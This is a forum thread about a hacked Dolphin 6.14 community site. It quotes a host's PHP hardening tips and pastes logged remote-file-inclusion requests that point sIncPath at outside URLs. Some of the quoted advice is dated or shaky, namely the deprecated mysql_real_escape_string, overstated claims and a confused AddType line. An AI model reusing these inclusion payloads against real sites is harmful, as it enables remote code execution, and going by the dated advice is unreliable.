I set up a test site with the free version of Dolphin 6.14 and it has been hacked. seems that the hackes are using SQL Injection there was a new user set up in the database with the name PJKing, and some new files in the Dolphin root directory. 2 of which were done.php and dones.php. I only realised this had happened when my hosting company suspended my account. because phishing emails had been sent from it.
Also globals were set to off. and all file permissions were set correctly. so I have no idea how this has happened.
Here is a list of 10 things to do to make your site more secure, this was sent to my by my hosting company but not being a coder I don't understand all of them.
The programs that operate database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site.
>
> 1. Set register_globals to OFF
> 2. Turn off Display Error/Warning Messages. set error_display to ZERO
> 3. Never run unescaped queries
> 4. Validate all user inputs. Items on Forms, in URLS and so on
> 5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
> 6. Access Control, U don't want ya user to have access to Admin function or Clean up scripts
> 7. htaccess is your friend use it to deny people (we also have a easy deny manager too in the cpanel)
> 8. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files you can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php)
> 9. To protect against SQL injection attacks Sometimes hackers will try to screw up you database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database!
>
> To protect against this, you need to use this PHP function:
> mysql_real_escape_string()
> This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
> Example:
> $name = $_REQUEST['name'];
> $safe_name = mysql_real_escape_string($name);
> Now you know the variable $safe_name, is safe to use with your SQL code.
>
> 10. Keep the PHP code to yourself. If anyone can see it they can expliot vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server's document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.
>
> You can find more information about hardening your PHP scripts at: http://phpsec.org/projects/guide/
>
> Thank you,
>
> HostMonster.Com
cheers
iced
You mentioned register globals last time I installed dolphin for someone at hostmonster register globals was indeed off by default.
There are some hacks out there that attempt to set globals.
It's a remote possibility that another account holder on the same server has a hack that they gained access see more
Hello,
I have restored the account from our weekly backups. You were hacked because of the "Dolphin" application being exploited ( /ray/modules/global/inc/header.inc.php ). The logs of this exploit are below. You will need to update this to the latest version available, or remove the exploitable code.
189.73.227.43 see more
> To protect against this, you need to use this PHP function:
> mysql_real_escape_string()
> This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
> Example:
> $name = $_REQUEST['name'];
> $safe_name = mysql_real_escape_string($name);
> Now you know the variable $safe_name, is safe to use with your SQL code.
/ray/modules/global/inc/header.inc.php?sIncPath=http://kadin.or.id/mail/id1.txt%3f%3f
Is there any patch available?
it seems to work but they seem to be trying with
/orca/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f
and
/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f